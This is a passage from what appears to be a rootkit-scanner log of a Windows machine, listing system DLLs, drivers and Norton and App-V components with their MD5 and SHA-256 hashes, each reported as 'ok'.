12:17:20.0252 0x1aa8 [ 6CB017C593140B296AA0299268A945C1, CFCDB8D082B5D6B06608E4C43E669CC0230ECF55F67A26CEDCF439DD3EB9368F ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\proxyclt.dll
12:17:20.0252 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\proxyclt.dll - ok
12:17:20.0255 0x1aa8 [ 1EBE9524683C7C4EED8B8BC93FB6FBCC, 78AF098E270EDE62466557091F14B2D37BDAB488F02E7CC769251FD17C02BA4A ] C:\Windows\SysWOW64\fltLib.dll
12:17:20.0256 0x1aa8 C:\Windows\SysWOW64\fltLib.dll - ok
12:17:20.0259 0x1aa8 [ C5FB982CD266E604ED3142102C26D62C, A6BC0D72E98F924274ECAD49C85F0775D1CD45B97CD43F53DF3992B560835FC5 ] C:\Windows\System32\drivers\Sftredirlh.sys
12:17:20.0259 0x1aa8 C:\Windows\System32\drivers\Sftredirlh.sys - ok
12:17:20.0263 0x1aa8 [ B7BD81BE9D9241A9FCD3C3A8D68346CA, 5B789E8799E4E8322EA1A189547092BDEE6151D642CB1678ACA03B45FAD9A63B ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\magent.dll
12:17:20.0263 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\magent.dll - ok
12:17:20.0267 0x1aa8 [ 828185688FDAAE6C7959B884ABED1766, 98A1F5DFDD517CDC7C20F0F64137D2A796E6E25EB82F7128F01B5DBCFF4C6587 ] C:\Windows\SysWOW64\schannel.dll
12:17:20.0267 0x1aa8 C:\Windows\SysWOW64\schannel.dll - ok
12:17:20.0271 0x1aa8 [ F11A57E91FDAECFB41A5CB21EB1EBC8E, 904DA963F2274ADF521660E3131DAC781E59C6FAEB393E57802A3B5638C09283 ] C:\Windows\System32\dssenh.dll
12:17:20.0271 0x1aa8 C:\Windows\System32\dssenh.dll - ok
12:17:20.0274 0x1aa8 [ E94C583CDE2348950155F2AF2876F34D, D00C7E0D665E467B712C68A446CC5BE14FDA743A2301878B3CEB72CDD0A8B8E7 ] C:\Windows\SysWOW64\mswsock.dll
12:17:20.0274 0x1aa8 C:\Windows\SysWOW64\mswsock.dll - ok
12:17:20.0277 0x1aa8 [ EAADD6E47ED2A7003ACE1793B98CF63F, EE090284CA4595B6A140949A41025926CEC3CCACCD2931B6AC77A1E14D20E5B4 ] C:\Windows\SysWOW64\msxml6.dll
12:17:20.0278 0x1aa8 C:\Windows\SysWOW64\msxml6.dll - ok
12:17:20.0281 0x1aa8 [ 73E8667A19FEEDD856DF2695E9E511D4, 68D66C36D1F293D10ADCC6A33C870F989A29743537592CF172F02E794BEAFD1C ] C:\Windows\SysWOW64\wship6.dll
12:17:20.0281 0x1aa8 C:\Windows\SysWOW64\wship6.dll - ok
12:17:20.0285 0x1aa8 [ EE5C8E27C37B79CB54A2FCEEED2DC262, 0A5E200FD65A491756B951A4A0ED39B88B7B313E97C2BBF3C91AC4C290772BB7 ] C:\Windows\SysWOW64\WSHTCPIP.DLL
12:17:20.0285 0x1aa8 C:\Windows\SysWOW64\WSHTCPIP.DLL - ok
12:17:20.0289 0x1aa8 [ 64C4B7ECAA516325EF600289480F8D89, CB18A61FDBB39B1B4600402E09F9EBF629B4615BABBDD0EAF19E110E58A406F5 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\distrptr.dll
12:17:20.0289 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\distrptr.dll - ok
12:17:20.0292 0x1aa8 [ B40420876B9288E0A1C8CCA8A84E5DC9, 0D3C73B45BC708D7B1E26DFB6D4F64031A998548FEA0FB5CE198ED716F7DC9A0 ] C:\Windows\SysWOW64\dnsapi.dll
12:17:20.0292 0x1aa8 C:\Windows\SysWOW64\dnsapi.dll - ok
12:17:20.0296 0x1aa8 [ 76F58DB8F85C125E0D6B3AA42F3BF1D0, 4871DD028E3C2D85AB3F25645A5A4D19D9E96F7BD0FE552005F221B0CF9633DA ] C:\Windows\SysWOW64\urlmon.dll
12:17:20.0296 0x1aa8 C:\Windows\SysWOW64\urlmon.dll - ok
12:17:20.0299 0x1aa8 [ 12B79422A23814429CDA9E734C58F78F, 88D8EBB4815896921ED88BC46E8C37844FB8C62CD05F507BFCF9825EBC9607DE ] C:\Program Files (x86)\Common Files\microsoft shared\Windows Live\WLIDNSP.DLL
12:17:20.0300 0x1aa8 C:\Program Files (x86)\Common Files\microsoft shared\Windows Live\WLIDNSP.DLL - ok
12:17:20.0303 0x1aa8 [ ED6EE83D61EBC683C2CD8E899EA6FEBE, F82592908D038C44D9F2E5C5B7BC663A2D370FC565F40420E1138A9E55F0E7EB ] C:\Windows\SysWOW64\rasadhlp.dll
12:17:20.0303 0x1aa8 C:\Windows\SysWOW64\rasadhlp.dll - ok
12:17:20.0307 0x1aa8 [ 1C60E09CA1C3A045BC4D367F67C915B7, DF1ED88CB57DA1AB1A4245AE0D5B42AFA3396EBF67B99411FFFB0DD06DE1AEAF ] C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll
12:17:20.0307 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll - ok
12:17:20.0310 0x1aa8 [ 007863E45F25AA47A4C30D0930BBFD85, 60F2ABA40D520FCA2C57FA2DB72E111C14F21821DA17F662837506B80C269634 ] C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
12:17:20.0311 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll - ok
12:17:20.0314 0x1aa8 [ FD557A50A65E44041CD2FCEF4BEB04DB, 746D5958F7198895D35A23566D3736D993D57726BF59D91421D8091C48926A26 ] C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
12:17:20.0315 0x1aa8 C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE - ok
12:17:20.0319 0x1aa8 [ A7E746F7E13542ED4A9BFC2D34043E82, 65BAA624D01CAF1C883141502E37384DDFDFDBC6E053F2B7DC996D1D9407081A ] C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSHARED.DLL
12:17:20.0319 0x1aa8 C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSHARED.DLL - ok
12:17:20.0323 0x1aa8 [ E9BB0CD09DA17C71FD1B9954D75AEEF7, FF5E2F04F1FD56FDD19368150B5750275F0A44E9EA9820C8087E84ECBBF45286 ] C:\Windows\SysWOW64\credui.dll
12:17:20.0323 0x1aa8 C:\Windows\SysWOW64\credui.dll - ok
12:17:20.0326 0x1aa8 [ 84174CA0E190BB9D1EFD0F005FE13B35, B0146E651DAD4A8050FAF70026F1B7CE16EF454EB6E31088CDEBE3CD57E6591C ] C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36\GdiPlus.dll
12:17:20.0326 0x1aa8 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36\GdiPlus.dll - ok
12:17:20.0330 0x1aa8 [ 565A30B70BE8A9B171839003F2D69683, 808BFBF2A0EC54417A254FDA0B22472CEA4A50F4C0952A6AB0ADF1119BD2543E ] C:\Windows\SysWOW64\hlink.dll
12:17:20.0330 0x1aa8 C:\Windows\SysWOW64\hlink.dll - ok
12:17:20.0334 0x1aa8 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] C:\Windows\System32\srvsvc.dll
12:17:20.0334 0x1aa8 C:\Windows\System32\srvsvc.dll - ok
12:17:20.0338 0x1aa8 [ 74AF1FFCAFD60DA88A386AE161F56438, FFDAC2829D384EEF04E4B756E25971C03B446A96A0CBE879801FB796AA79E7CA ] C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\en-us\CVHIntl.dll
12:17:20.0338 0x1aa8 C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\en-us\CVHIntl.dll - ok
12:17:20.0341 0x1aa8 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] C:\Windows\System32\browser.dll
12:17:20.0342 0x1aa8 C:\Windows\System32\browser.dll - ok
12:17:20.0345 0x1aa8 [ CFEFA40DDE34659BE5211966EAD86437, AC0A3AD8AA47012C40785013E2273FC571F416BC9C9FFDA418FE72B3123C1FB0 ] C:\Windows\System32\netmsg.dll
12:17:20.0345 0x1aa8 C:\Windows\System32\netmsg.dll - ok
12:17:20.0348 0x1aa8 [ 81749E073AC5857B044A686B406E5244, 3884EE705CA34235B29942FEDA8FEA654A21139B8C2A1D5E009C7D07D6E6ADF1 ] C:\Windows\System32\clusapi.dll
12:17:20.0348 0x1aa8 C:\Windows\System32\clusapi.dll - ok
12:17:20.0352 0x1aa8 [ FF80CAD87555E8E4D2CFD7B9058343F8, 07653773FBEC1996408B8507B08E0E1E812830063F932F897F4B39EE63DDCDC4 ] C:\Windows\System32\sscore.dll
12:17:20.0352 0x1aa8 C:\Windows\System32\sscore.dll - ok
12:17:20.0355 0x1aa8 [ 344FCC9850C3A8A3B4D3C65151AF8E4C, C38853454E153B1AB4AEAE1AAFB7CB4B2E6234208CF24C09F3B2AFE25E271C5C ] C:\Windows\System32\resutils.dll
12:17:20.0356 0x1aa8 C:\Windows\System32\resutils.dll - ok
12:17:20.0359 0x1aa8 [ D835EDB2FC3368F3366C07493DFF2B41, CAFEB1DB1D8AFEAC5E0981E37C04B558D351D638CB1C9D91D7693E2C428BA074 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftintf.dll
12:17:20.0359 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftintf.dll - ok
12:17:20.0363 0x1aa8 [ ED195AC76E10F17F6DD60C49666F2A83, 724935F1B0E700843D3850D70E8EA9FB6D838147B25426A03D462F1526D39112 ] C:\Windows\SysWOW64\msv1_0.dll
12:17:20.0363 0x1aa8 C:\Windows\SysWOW64\msv1_0.dll - ok
12:17:20.0367 0x1aa8 [ 1128637CAD49A8E3C8B5FA5D0A061525, 6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278 ] C:\Windows\SysWOW64\cryptdll.dll
12:17:20.0367 0x1aa8 C:\Windows\SysWOW64\cryptdll.dll - ok
12:17:20.0371 0x1aa8 [ AFB5B500AD69E24ED1BC15D1161641EF, C8EE01224FA8020DAE6F9BCE2FD88EDC2441164393ED6E68DAA1EA0B8190276F ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL
12:17:20.0371 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL - ok
12:17:20.0375 0x1aa8 [ 88351B29B622B30962D2FEB6CA8D860B, A16CAD7D94C1C9807083BB36E9B4C3C14E6482C4CA2BDFACBCC86E737DDCE42E ] C:\Windows\System32\rasadhlp.dll
12:17:20.0375 0x1aa8 C:\Windows\System32\rasadhlp.dll - ok
12:17:20.0377 0x1aa8 [ 45CFBFA8EDC3DF4E2B7FB0D0260FE051, 8EFD0A6DE6F4E335D342782190008FB5AC84A6ADE49170B310DEC9AC48E623E8 ] C:\Windows\System32\localspl.dll
12:17:20.0377 0x1aa8 C:\Windows\System32\localspl.dll - ok
12:17:20.0381 0x1aa8 [ 3285481F5C12305CA104A6C493CA5A0B, ADB39B15D26A954B0F347C7BAFCC76DE5E3CF3CF05736E8987E0832AA7F8563C ] C:\Windows\System32\spoolss.dll
12:17:20.0381 0x1aa8 C:\Windows\System32\spoolss.dll - ok
12:17:20.0385 0x1aa8 [ FA132E1DAB518B28F4B20DB154A647FC, 94D8A253EAC963470E77162830958F67EE6992341DB6FCE81DAE1592AD8582B8 ] C:\Windows\System32\CNMLMB7.DLL
12:17:20.0385 0x1aa8 C:\Windows\System32\CNMLMB7.DLL - ok
12:17:20.0388 0x1aa8 [ C5AC93CF3BA30D367FB49148A2B673B9, 07B556039BBA841BC9F28979C3AD5D238B55391F921C9C805F3AFC9EFB437766 ] C:\Windows\System32\PrintIsolationProxy.dll
12:17:20.0388 0x1aa8 C:\Windows\System32\PrintIsolationProxy.dll - ok
12:17:20.0392 0x1aa8 [ 46B8E04B3C35CB93F89EF27746D7A908, D77F8BD5D6C82AE24334B682D9DD43EFA8F48E2BE6A64007192569129459B9B8 ] C:\Windows\System32\EP0SLM01.DLL
12:17:20.0392 0x1aa8 C:\Windows\System32\EP0SLM01.DLL - ok
12:17:20.0395 0x1aa8 [ 19E41CCCEE697CC9465396B370929792, A9FC4C33C71C3677FE57779380E55FDE2AC0B0C70A9DBCBA0D0B6FA92C709A7F ] C:\Windows\System32\FXSMON.dll
12:17:20.0395 0x1aa8 C:\Windows\System32\FXSMON.dll - ok
12:17:20.0399 0x1aa8 [ 93518C6EDE0B61BCBD02BDB02BD05FEE, 3637F5E5F15093AFB501EE910368CF900B422AC22669391FFA4198BBAE6F8FCB ] C:\Windows\System32\snmpapi.dll
12:17:20.0399 0x1aa8 C:\Windows\System32\snmpapi.dll - ok
12:17:20.0403 0x1aa8 [ 32A3C8600AF124CBAAD845F13CFAE3CB, F36FE9E57D5C509FEECE890F9F8717F9CC6F762E32AE0B7DB7E0153370CE0B9D ] C:\Windows\System32\tcpmon.dll
12:17:20.0403 0x1aa8 C:\Windows\System32\tcpmon.dll - ok
12:17:20.0406 0x1aa8 [ FFF9D00CF16397C64317F213484F94BD, 94D0584E14BDB27F61F59A7BCEA529A1594261BE0CE74502C13E8865843BA414 ] C:\Windows\System32\wsnmp32.dll
12:17:20.0406 0x1aa8 C:\Windows\System32\wsnmp32.dll - ok
12:17:20.0409 0x1aa8 [ DF72A9936D0C3F517083119648814B09, 6BA4DCAC2F55A393A266ED0B2AF92B38141654D1666E3E143D85BBAF21663E1E ] C:\Windows\System32\usbmon.dll
12:17:20.0409 0x1aa8 C:\Windows\System32\usbmon.dll - ok
12:17:20.0413 0x1aa8 [ A1D7E3ADCDB07DDB6F423862DCB1A52B, 6191C33D2AE090F6F055D6AE211096CE8F003EC5518A5333EE1E376052176BAB ] C:\Windows\System32\WSDMon.dll
12:17:20.0413 0x1aa8 C:\Windows\System32\WSDMon.dll - ok
12:17:20.0416 0x1aa8 [ F1B205F932F62F94506A5F332C895DAF, F02F01F20F655DD919C71AE814E4C3DD43330AAD1425FC5B1497F1613917CCDE ] C:\Windows\System32\WSDApi.dll
12:17:20.0416 0x1aa8 C:\Windows\System32\WSDApi.dll - ok
12:17:20.0420 0x1aa8 [ C55516D98DD5D8F0153C2A9B4227DA86, DBC62B776CF06D0873A4C7CFCDF5B6F5C6E6C41917C326C090BCE58DC66EE09C ] C:\Windows\System32\webservices.dll
12:17:20.0420 0x1aa8 C:\Windows\System32\webservices.dll - ok
12:17:20.0424 0x1aa8 [ B5055B51BAA0FD0A736A88653DA3C1C0, A3BD057C7E8C926930BA7E9D11427D26FB37267026A0B72AB4021101EE424F74 ] C:\Windows\System32\fundisc.dll
12:17:20.0424 0x1aa8 C:\Windows\System32\fundisc.dll - ok
12:17:20.0427 0x1aa8 [ 4581716B4BF76ACFD8E167EB0B26D82A, 39D822527114EEED68044CCE4D542767F53978D9E0A7F72638F1CA9A016DE13B ] C:\Windows\System32\fdPnp.dll
12:17:20.0427 0x1aa8 C:\Windows\System32\fdPnp.dll - ok
12:17:20.0431 0x1aa8 [ 4FB01397DEBE38C59B51D031C144F0DA, D066EBC897A118CF31BCE3B3A4EA4304E634BDF427035B8CCE12A20B528012C6 ] C:\Windows\System32\spool\prtprocs\x64\CNMPDB7.DLL
12:17:20.0431 0x1aa8 C:\Windows\System32\spool\prtprocs\x64\CNMPDB7.DLL - ok
12:17:20.0434 0x1aa8 [ 1D626FE2E13C1CE49CA0136CFF214E93, 4F02DD92045CF244979FFD074B2BDE6925A909227A474C60DCABE4384D916218 ] C:\Windows\System32\spool\prtprocs\x64\winprint.dll
12:17:20.0435 0x1aa8 C:\Windows\System32\spool\prtprocs\x64\winprint.dll - ok
12:17:20.0439 0x1aa8 [ 67CF11E00D026A5C0C88EA5F84D501E5, 5081A87466116232CF07F58229967B6C0CD3738B64A56EFC6BB3EBDA62E378F6 ] C:\Windows\System32\win32spl.dll
12:17:20.0439 0x1aa8 C:\Windows\System32\win32spl.dll - ok
12:17:20.0442 0x1aa8 [ 507D5567A0A4EE86C4B0CE2CE1777025, 408770B00CED498BF7782054F17A5CB361CF65429B0C816403D70E416E0EEF23 ] C:\Windows\System32\inetpp.dll
12:17:20.0442 0x1aa8 C:\Windows\System32\inetpp.dll - ok
12:17:20.0445 0x1aa8 [ 1BF0CB861A48FEB1638228760750F3CB, 37C781A8C546EAD8B4D28BD7D730B9AC78EB799599AD69DAD9054B6F9F1DD6BD ] C:\Windows\System32\cscapi.dll
12:17:20.0445 0x1aa8 C:\Windows\System32\cscapi.dll - ok
12:17:20.0449 0x1aa8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] C:\Windows\System32\wdi.dll
12:17:20.0449 0x1aa8 C:\Windows\System32\wdi.dll - ok
12:17:20.0452 0x1aa8 [ F7073C962C4FB7C415565DDE109DE49F, 781E7088DCEFBC34A808C3E7DA41A56112B3F23ABE9F54B5EF4D5CD9CD016B1D ] C:\Windows\System32\npmproxy.dll
12:17:20.0453 0x1aa8 C:\Windows\System32\npmproxy.dll - ok
12:17:20.0457 0x1aa8 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] C:\Windows\System32\wpdbusenum.dll
12:17:20.0457 0x1aa8 C:\Windows\System32\wpdbusenum.dll - ok
12:17:20.0461 0x1aa8 [ 4449D23E8F197862F1B16F1E6C89C36C, 93AF52BF8E870C0381F027D3BB8F6829E449242074472F1593EB8172D7EB6559 ] C:\Windows\System32\diagperf.dll
12:17:20.0461 0x1aa8 C:\Windows\System32\diagperf.dll - ok
12:17:20.0464 0x1aa8 [ BF4AC709BE5BF64F331F5D67773A0C82, 96E5A2A12D386B8A7976FEC76FD350E6A3EEBDF5763F4BBF4AB18880E9F269E0 ] C:\Windows\System32\perftrack.dll
12:17:20.0464 0x1aa8 C:\Windows\System32\perftrack.dll - ok
12:17:20.0468 0x1aa8 [ E64D9EC8018C55873B40FDEE9DBEF5B3, 2DB11E7C631A9887CB75AFEAD2C79EC65F82C51F5F073CEFC8CDDF664EFF29C1 ] C:\Windows\System32\PortableDeviceApi.dll
12:17:20.0468 0x1aa8 C:\Windows\System32\PortableDeviceApi.dll - ok
12:17:20.0472 0x1aa8 [ AFA79C343F9D1555F7E5D5FA70BB2A14, 440EF3ADC1F5C7A5ED3E872C8D8DFA61B039454C3CA67F8A51CA8BDCFDC4BA4A ] C:\Windows\System32\PortableDeviceConnectApi.dll
12:17:20.0472 0x1aa8 C:\Windows\System32\PortableDeviceConnectApi.dll - ok
12:17:20.0476 0x1aa8 [ E1B22739C933BE33F53DB58C5393ADD3, 26EE0DD091D2E00DECC774DC1EEDFFDE69AF74B0C769CCBE091AFC32C66E4207 ] C:\Windows\System32\Apphlpdm.dll
12:17:20.0476 0x1aa8 C:\Windows\System32\Apphlpdm.dll - ok
12:17:20.0480 0x1aa8 [ 9719E3D834F5C8C43F56A93DFA497023, 4D78D4BD4835C0A237821967156C19DF4B90384A6BCB1F48CEAF35D003A0099A ] C:\Windows\System32\pnpts.dll
12:17:20.0480 0x1aa8 C:\Windows\System32\pnpts.dll - ok
12:17:20.0483 0x1aa8 [ E811F8510B133E70CF6E509FB809824F, 82541F2B15748250462B67B6C77530D4F7C45A1482237EC49B28F9FA5A414108 ] C:\Windows\System32\wdiasqmmodule.dll
12:17:20.0483 0x1aa8 C:\Windows\System32\wdiasqmmodule.dll - ok
12:17:20.0487 0x1aa8 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] C:\Windows\System32\hidserv.dll
12:17:20.0488 0x1aa8 C:\Windows\System32\hidserv.dll - ok
12:17:20.0492 0x1aa8 [ FDC385A0F7D7DD880C4622D1DF08ABE9, D9596264D98B09A5C44DD63B69B7253377B5FF237B6F2C4F97258E86FFAD055A ] C:\Windows\System32\ntprint.dll
12:17:20.0492 0x1aa8 C:\Windows\System32\ntprint.dll - ok
12:17:20.0496 0x1aa8 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] C:\Windows\System32\bthserv.dll
12:17:20.0496 0x1aa8 C:\Windows\System32\bthserv.dll - ok
12:17:20.0500 0x1aa8 [ CDAD3376DFF3D9AC7FDCBE2B94B0D3C8, C0B22B8C402EEEAF68F5380BC265C15418934D2F702F0A43674EC93853E26040 ] C:\Windows\System32\shfolder.dll
12:17:20.0501 0x1aa8 C:\Windows\System32\shfolder.dll - ok
12:17:20.0504 0x1aa8 [ 58A0CDABEA255616827B1C22C9994466, 4FE1140AA8D3995579DE8CDF4ECAD1978804D05351EABB4079A63B303EF1B451 ] C:\Windows\System32\NapiNSP.dll
12:17:20.0504 0x1aa8 C:\Windows\System32\NapiNSP.dll - ok
12:17:20.0508 0x1aa8 [ 613C8CE10A5FDE582BA5FA64C4D56AAA, 30507B6BA79E1A271B07BBA58B4FF463678BE0960266A1D5E88031E932D768B6 ] C:\Windows\System32\pnrpnsp.dll
12:17:20.0508 0x1aa8 C:\Windows\System32\pnrpnsp.dll - ok
12:17:20.0512 0x1aa8 [ 2E2072EB48238FCA8FBB7A9F5FABAC45, AC70B9FC24847EEC2E18008F2894DCDAC19A9C90D5D88729326E493CA524F5C3 ] C:\Windows\System32\winrnr.dll
12:17:20.0512 0x1aa8 C:\Windows\System32\winrnr.dll - ok
12:17:20.0516 0x1aa8 [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] C:\Windows\System32\IPSECSVC.DLL
12:17:20.0516 0x1aa8 C:\Windows\System32\IPSECSVC.DLL - ok
12:17:20.0519 0x1aa8 [ 9BC93C9ACFA34DB5A41B89357B31E4ED, C3B9DDCB31970F91F8CAF85D2431903DB1738872775EEFD6712B7646BDE1250C ] C:\Windows\System32\FwRemoteSvr.dll
12:17:20.0519 0x1aa8 C:\Windows\System32\FwRemoteSvr.dll - ok
12:17:20.0523 0x1aa8 [ 639774C9ACD063F028F6084ABF5593AD, 9DFD80610CBBC9188F6C6BC85C87016B0AE42254FC289C2B578E85282BDD9C23 ] C:\Windows\System32\taskhost.exe
12:17:20.0523 0x1aa8 C:\Windows\System32\taskhost.exe - ok
12:17:20.0527 0x1aa8 [ E629F1A051C82795DDFFD3E8D4855811, 6E4DFFEAB2795C98EA6DCAF10EA6D97413D0F8CA0C04869CB20B74FF4D6FE679 ] C:\Windows\System32\dimsjob.dll
12:17:20.0527 0x1aa8 C:\Windows\System32\dimsjob.dll - ok
12:17:20.0531 0x1aa8 [ 94DFBB481BF51158B216E23C5C1C9D6E, 0199086A70B9B63E48A7A15C8AE5442E9C6BC0173BD80A104DE1BE6A6C25F202 ] C:\Windows\System32\certcli.dll
12:17:20.0531 0x1aa8 C:\Windows\System32\certcli.dll - ok
12:17:20.0534 0x1aa8 [ 35CB97CBC3EDC463418ED4997AAB29B6, EE60EABE2D87CEDD68FB8985B6C5D70930015FB2B8DB9FDCB4044587BC6ECA4C ] C:\Windows\System32\pautoenr.dll
12:17:20.0534 0x1aa8 C:\Windows\System32\pautoenr.dll - ok
12:17:20.0538 0x1aa8 [ 263B26106606A010CF877472B535E4BB, 43ECE89E428D2BB34244894BEBA1B946B0767649D15B1C715223E4E471A9E504 ] C:\Windows\System32\CertEnroll.dll
12:17:20.0538 0x1aa8 C:\Windows\System32\CertEnroll.dll - ok
12:17:20.0542 0x1aa8 [ A8EDB86FC2A4D6D1285E4C70384AC35A, 61B8955CE0A2AA9D0719920B30216717B349B6FBE11C697C31CFA84F859CC1AE ] C:\Windows\System32\dllhost.exe
12:17:20.0542 0x1aa8 C:\Windows\System32\dllhost.exe - ok
12:17:20.0545 0x1aa8 [ A0A2C1D812C231C9BFE119FDC68E341B, F94446594EE17505956A715DFB28B51D09F00A7A65E56950661B889A57DE8FA8 ] C:\Windows\System32\IDStore.dll
12:17:20.0545 0x1aa8 C:\Windows\System32\IDStore.dll - ok
12:17:20.0549 0x1aa8 [ 863F793D15B4026B1A5FDECA873D4D84, AF7ABD95BB5467551562F129F03C7AC9D52A021F7E547609F40A80E66932C942 ] C:\Windows\SysWOW64\apphelp.dll
12:17:20.0549 0x1aa8 C:\Windows\SysWOW64\apphelp.dll - ok
12:17:20.0553 0x1aa8 [ 65EA57712340C09B1B0C427B4848AE05, 5FDCF73191BFF9DBB03886755FFCF0BC15849F0E216884A5A8B9BB375FA7C1A5 ] C:\Windows\System32\taskeng.exe
12:17:20.0553 0x1aa8 C:\Windows\System32\taskeng.exe - ok
12:17:20.0556 0x1aa8 [ 23566F9723771108D2E6CD768AC27407, FAC0293DD1061B151E779BF4B245E6652C951FEDEBC602A166156DFBD38B5D67 ] C:\Windows\System32\AtBroker.exe
12:17:20.0557 0x1aa8 C:\Windows\System32\AtBroker.exe - ok
12:17:20.0561 0x1aa8 [ 6CEF7856A3EFAC59470F6208F0F585CE, 0F7A80DB821FDE6580E9481B6DA44844F717DDB4983B0E3D562BE43726153951 ] C:\Windows\System32\mpr.dll
12:17:20.0561 0x1aa8 C:\Windows\System32\mpr.dll - ok
12:17:20.0564 0x1aa8 [ 94EEAC26F57811BD1AEFC164412F7FCE, 7390BCD7709D48DE75D7D6E06AA7356D1C58EE63F3CC2E07ABCD2E2FF6CC81CF ] C:\Windows\System32\PlaySndSrv.dll
12:17:20.0564 0x1aa8 C:\Windows\System32\PlaySndSrv.dll - ok
12:17:20.0568 0x1aa8 [ BAFE84E637BF7388C96EF48D4D3FDD53, 11C194D9ADCE90027272C627D7FBF3BA5025FF0F7B26A8333F764E11E1382CF9 ] C:\Windows\System32\userinit.exe
12:17:20.0568 0x1aa8 C:\Windows\System32\userinit.exe - ok
12:17:20.0571 0x1aa8 [ F162D5F5E845B9DC352DD1BAD8CEF1BC, 8A7B7528DB30AB123B060D8E41954D95913C07BB40CDAE32E97F9EDB0BAF79C7 ] C:\Windows\System32\dwm.exe
12:17:20.0572 0x1aa8 C:\Windows\System32\dwm.exe - ok
12:17:20.0575 0x1aa8 [ FCFCD1101C5DA23B4B95F93D02B2C169, 040A086875B6C5475490A2F8B0CF4FF20DDB4FEDFE5FCABBA49692AA05F40527 ] C:\Windows\System32\dwmredir.dll
12:17:20.0575 0x1aa8 C:\Windows\System32\dwmredir.dll - ok
12:17:20.0579 0x1aa8 [ 4BA77A5EF71C14C764B0ED4701683E3E, 066A064CDBE09BF8BE1DF5B259F30FF6C124A1C3D637800D3E19E8E25EDB950E ] C:\Windows\System32\dwmcore.dll
12:17:20.0579 0x1aa8 C:\Windows\System32\dwmcore.dll - ok
12:17:20.0583 0x1aa8 [ 1F1CA9E99DD5BF918BE0BF30B5A42FDA, 8A6ACEFAB95E5275CBFBE6CCB5A6C3A6A471260B279B9063E86B9C7765E18656 ] C:\Windows\System32\MsCtfMonitor.dll
12:17:20.0583 0x1aa8 C:\Windows\System32\MsCtfMonitor.dll - ok
12:17:20.0586 0x1aa8 [ F09A9A1AD21FE618C4C8B0A0D830C886, 29831DDAB2AB105358FBC067CDF96428220B6743CD6019F6FE74BAC7AF325E7E ] C:\Windows\System32\msutb.dll
12:17:20.0586 0x1aa8 C:\Windows\System32\msutb.dll - ok
12:17:20.0590 0x1aa8 [ 9BB99503D6A4DD62569EDE9E5E2672A5, 6F4EA5BC50B1F929735246485263078BEF1B3BEB33F78CB1F483F13AA226C27E ] C:\Windows\System32\HotStartUserAgent.dll
12:17:20.0590 0x1aa8 C:\Windows\System32\HotStartUserAgent.dll - ok
12:17:20.0594 0x1aa8 [ F5CEF064C7E6D95DA86B9D064A56A969, F118CD4364690F37A07AE458E043E8CFBA98F332DC9E7228C83409CF26F6EF6D ] C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll
12:17:20.0595 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll - ok
12:17:20.0598 0x1aa8 [ 9AE80F6A66B30E3ED8CDF858CF28B11B, A93E470DC54E3C74C10979D49CABB9A34893F9E847F88491F935DB44EEC3541A ] C:\Windows\System32\d3d10_1.dll
12:17:20.0598 0x1aa8 C:\Windows\System32\d3d10_1.dll - ok
12:17:20.0601 0x1aa8 [ 63F72417CA38D8FC8F53709649B589E3, 39AE8AFFCFB8A9E345FC4C6F11926F25552C464380F88CDECD299FD27AF7866B ] C:\Windows\System32\d3d10_1core.dll
12:17:20.0602 0x1aa8 C:\Windows\System32\d3d10_1core.dll - ok
12:17:20.0605 0x1aa8 [ 522B0466ED967A0762E9AF5B37D8F40A, B14C62D059BC7CF430E1B0F6E18E31EFD1959EFB3025A2B0EBB11751F38DD6D4 ] C:\Windows\System32\esent.dll
12:17:20.0605 0x1aa8 C:\Windows\System32\esent.dll - ok
12:17:20.0608 0x1aa8 [ 805A52C5AE26C28E88FDD9BCCFE6F312, 4FF28D3658C31722B7DD036DED9D544B14841C0E0B94D31A8EC5AB92128DA020 ] C:\Windows\System32\TSChannel.dll
12:17:20.0608 0x1aa8 C:\Windows\System32\TSChannel.dll - ok
